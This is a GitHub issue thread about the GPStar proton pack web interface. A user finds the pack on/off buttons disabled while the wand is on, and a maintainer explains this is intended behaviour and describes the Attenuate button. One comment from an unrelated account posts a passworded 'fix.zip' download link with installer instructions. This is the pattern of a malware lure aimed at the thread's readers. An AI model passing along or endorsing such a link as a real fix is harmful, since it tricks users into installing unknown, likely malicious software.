gpstar81/GPStar-proton-pack #371: [Bug]: Webpage pack control problems

Toy203, 2024-08-26:
### What actions were attempted?

With the wand connected and turned on, you can't shut the pack down or turn it back on. Vent feature works as expected instead, regardless of the wand status.

### What actually happened?

While the buttons for pack control works as intended when the wand is off, the Pack On and Off buttons get greyed out once the wand is turned on.

### What was expected?

I guess all the buttons should be available regardless of the wand status. I'm not clear when you're supposed to use the Attenuate feature btw.

### Firmware Version

5.3.3

### Mode in Use

Super Hero / Video Game

### Notable Hardware

ESP32

### Homework Completed

- [X] I did my part!

Qsgz2023ji5ban, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

nomakewan, 2024-08-26:
This is by design. If the wand is active the Attenuator cannot power down the pack.

The "Attenuate" button is for when you are actively firing and the overheat warning alarm comes on. It's the same as if you have a physical Attenuator and turn the dial to attenuate the proton stream.

closed 2024-08-26 by nomakewan

Toy203, 2024-08-26:
Oh I see, I wasn't thinking of the wand control/proper attenuator. Just found weird that I couldn't turn it off an on from my phone on the field.